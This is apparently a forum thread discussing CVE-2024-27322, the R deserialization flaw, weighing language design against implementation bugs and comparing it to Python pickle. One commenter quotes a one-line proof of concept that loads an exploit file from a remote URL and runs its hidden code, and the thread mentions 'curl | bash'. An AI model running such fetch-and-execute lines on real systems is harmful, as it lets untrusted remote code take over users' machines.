Isn't this demonstrably false? I.e. run this [1]
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).
When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.
I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.
FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.
[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...
I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?
You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.
If you want security don't download files from the internet and execute them.
Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.
If a malicious user tries to smuggle something into a csv or json file that isn’t possible. But when reading in an RDS it’s trivial.
I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I defnn in it ly don’t feel comfortable trusting theirs.
Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)
>Description
>Reload datasets written with the function save.
>> This does not prove the concept of promises and/or serialization are inherently unsafe core features. It simply shows there's some implementation issues to address. You go further to talk about these implementation issues which is helpful and good, but it does nothing to prove unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.
How many languages have gotten and fixed such bugs. Are those languages unsafe/unsane or were their implementations simply buggy?
Though in practice the difference isn't there, as we use language implementations, not their ideal conceptual forms, but I do think its unfair to make such claims, and say that some exploit of a langauge implementation causes the concepts within the language to be inherently exploitable.
- might be missing something, but it seems there's 2 different streams being crossed? (you do make good points about implementation imho, nothing wrong there ofc! :))
If I read the projects statement right, they think you should only load what you already trust.
The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.
Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.
I also don’t know if deserializing is 100% secure even now, because it only detects whether the root value is lazy, and I’m not sure if certain value’s children can be lazy as well.
I think the larger issue is that most languages are insecure unless you go out of your way to be careful. Many package managers (including cargo) let dependencies run arbitrary build scripts. AFAIK reading a Python picklefile can invoke arbitrary code, which is arguably worse than deserializing an RDS file because in R you at least have to read the malicious deserialized value. The problem of reading untrusted data isn’t new, see log4j and SQL injections.
All input should be either a) trusted or b) handled carefully. Then it doesn’t matter the language. The problem is that’s not easy. Like in R, if `readRDS` really can still return promises, then “handling it carefully” means inspecting every nested value without reading it (this is possible in R with reflection); or more likely (as with Python’s pickling), read the data in a more constrained format.
In the sense that for sufficiently complex ecosystems (read: all widely used programming ecosystems) each component may itself be theoretically secure... and yet the ways they are commonly used in practice are insecure.
>> Users should ensure that they only use R code and data from trusted sources and that the privileges of the account running R are appropriately limited.
IMHO, this is a cop-out. Abrogating responsibility for common use patterns in your ecosystems isn't how you make everyone more secure.
Better: 'What are our users actually doing?' -> 'Why are they doing that?' (usually: inconvenient UX around secure alternatives) -> 'How can we make it easier to use secure alternatives?'
It does touch an interesting point, 'safeness' of a language itself. I think a lot of languages have bugs in their core libraries and implementaties, and you _could_ go as far as to say that language is then insecure.
But this is not really true. The language itself, is not its implementation. The design choices and concepts provided by R, i think, are not inherently insecure. Though, as this bug shows, implementation of those concepts, can be done, inadvertendly/unwittingly, in an insecure way.
I would like to encourage people to stop speaking about languages as safe/unsafe. This seems to popular today. The languages themselves are complicated to implement as hell, and there comes bugs with complex implementations.
Raise the bug, perhaps if severe, raise awareness of it. But don't shit on decades of diligent people's work because you found a bug and want your company or group to get some good marketing out of it. this is inherently unethical. These people are great programmers, likely much more advanced in their knowlege of languages and language implementation than some hacker who runs into a security hole. That should be respected and commended, and hackers can help these guys to improve their already awesome creations.
Thanks to the implementers, thanks to the hackers, and lets all be friendly and peaceful, and not try to exploit someones honest bug into some marketing opportunity by taking a shit right on their work.
So at the end of the day, it does apply patch pressure to regulated companies.
[1] and a blog post for bragging, thankfully they didn't do a name and a logo.
From what I can tell, these RDS files are a common way of sharing data among R users. I would be relatively surprised if reading someone else's dataset was able to execute arbitrary code.
I think this is more like if reading a CSV via numpy could execute code.
A few years back I have heard from a lot of people working in ML communities that they are surprised that `numpy.load` is able to execute arbitrary code.
• Make clear the bug is due to unsafe deserialization (not serialization as their statement says). This is important because unsafe deserialization is a major source of remote code execution vulnerabilities.
• Update the documentation to make it clear that R’s serialization and deserialization functions are not safe to use for sharing data across the network. Serialized objects should be treated as code, not data.
I am still amazed on how many people on HN seem to get worked up over vulnerability names. God forbid someone also slaps a piece of clip art or whatever on the blog post. Worse yet, if they buy a $5 domain... the horror!
Maybe it's just me, but I'd much rather remember "Heartbleed" over "CVE-2014-0160".
For less cool bugs a logo and a name seems rather... strange, because it happens all the time and it's not clear why it's special. Imagine a coworker fixed a random JIRA ticket which may be "switching to night mode does not work on a certain page" and then named it "Nightfall" and a logo and a landing page and a lot of bragging in the next periodic meeting.
Cybersecurity firm, surely? Of all the things not to proofread … a press release.